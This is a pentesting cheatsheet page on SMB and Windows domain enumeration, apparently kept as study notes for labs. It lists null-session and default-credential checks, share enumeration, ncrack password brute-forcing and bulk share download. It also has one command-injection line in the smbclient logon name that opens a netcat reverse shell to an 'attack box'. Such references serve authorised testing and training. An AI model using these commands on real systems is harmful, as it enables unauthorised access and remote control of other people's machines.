✒️
Pentesting Cheatsheet
  • Introduction
  • Basics
  • Information Gathering | OSINT
  • Penetration Testing
    • Scanning and Enumeration
    • HTTP and HTTPS
    • SMB | Windows Domain Enumeration
    • NFS
    • SMTP
    • Reverse Shells
    • Buffer Overflow | Buf Exploitation
    • Linux Privilege Escalation
    • Miscellaneous
    • Redis
  • Active Directory
    • AD Extras
    • Attack Vectors
    • Post Compromise Enumeration
    • Post Compromise Attacks
  • Pivoting
  • Windows Privesc
    • Window Tools/Resources
    • Meterpreter Privesc
    • Powershell Scripting
  • Vulnhub/ PG/ THM/ HTB
  • Apache Log4j
  • Linux Forensics Cheatsheet
Powered by GitBook
On this page

Was this helpful?

  1. Penetration Testing

SMB | Windows Domain Enumeration

PreviousHTTP and HTTPSNextNFS

Last updated 3 years ago

Was this helpful?

SAMB / SMB / Windows Domain Enumeration

nmblookup -A target
smbclient //MOUNT/share -I target -N
rpcclient -U "" target
enum4linux target

Also see, nbtscan cheat sheet (right hand menu).

COMMAND

DESCRIPTION

nbtscan 192.168.1.0/24

Discover Windows / Samba servers on subnet, finds Windows MAC addresses, netbios name and discover client workgroup / domain

enum4linux -a target-ip

Do Everything, runs all options (find windows client domain / workgroup) apart from dictionary based share name guessing

Fingerprint SMB Version

smbclient -L //192.168.1.100

Find open SMB Shares

nmap -T4 -v -oA shares --script smb-enum-shares --script-args smbuser=username,smbpass=password -p445 192.168.1.0/24

Enumerate SMB Users

nmap -sU -sS --script=smb-enum-users -p U:137,T:139 192.168.11.200-254 
nmap --script smb-protocols 10.10.10.10
​
smbclient -L //10.10.10.10
smbclient -L //10.10.10.10 -N         // No password (SMB Null session)
smbclient --no-pass -L 10.10.10.10
smbclient //10.10.10.10/share_name
​
smbmap -H 10.10.10.10
smbmap -H 10.10.10.10 -u '' -p ''
smbmap -H 10.10.10.10 -s share_name 
​
crackmapexec smb 10.10.10.10 -u '' -p '' --shares
crackmapexec smb 10.10.10.10 -u 'sa' -p '' --shares
crackmapexec smb 10.10.10.10 -u 'sa' -p 'sa' --shares
crackmapexec smb 10.10.10.10 -u '' -p '' --share share_name
crackmapexec smb 192.168.0.115 -u '' -p '' --shares --pass-pol
​
​
enum4linux -a 10.10.10.10
​
rpcclient -U "" 10.10.10.10
    * enumdomusers 
    * enumdomgroups
    * queryuser [rid]
    * getdompwinfo
    * getusrdompwinfo [rid]
​
ncrack -u username -P rockyou.txt -T 5 10.10.10.10 -p smb -v
​
mount -t cifs "//10.1.1.1/share/" /mnt/wins
​
mount -t cifs "//10.1.1.1/share/" /mnt/wins -o vers=1.0,user=root,uid=0,gid=0
​
SMB Shell to Reverse Shell : 
​
    smbclient -U "username%password" //192.168.0.116/sharename
    smb> logon “/=nc ‘attack box ip’ 4444 -e /bin/bash" 
    
Checklist :
    * Samba symlink directory traversal attack

Download whole smbshare with one command: smbget -R smb://192.168.206.148/kathy

LogoPWK Notes: SMB Enumeration Checklist [Updated]0xdf hacks stuff